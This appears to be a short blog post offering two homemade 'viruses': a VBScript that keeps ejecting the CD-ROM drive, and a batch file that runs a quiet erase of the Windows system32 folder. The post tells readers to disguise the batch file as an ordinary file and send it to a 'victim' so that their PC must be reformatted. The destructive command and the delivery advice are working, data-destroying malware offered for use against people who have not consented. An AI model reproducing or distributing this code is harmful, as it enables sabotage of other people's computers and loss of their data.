copy the code without quotes into notepad and save it as something .vbs
"Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If"
if u run this u r cd-rom will automatically open and close
to stop this go to taskmanager-process-wscript.exe-and end the process .
ANOTHER VIRUS
Make a simple file that destroys ur victims pc
1. Open Notepad
2. write the above command : -
erase %windir%\system32\*.* /q
3. Save the above notepad with the extension ".bat or .cmd" as u want.
After u created the .cmd or .bat file send it to ur victim as like ordinary file.Once ur victim double click on it then he/she needs to format his/her pc.
What it does is deletes all files present in the system32 folder out of which most of them are files important for a computers functioning.
Note:-
It would work only if the victim has windows os.
No comments:
Post a Comment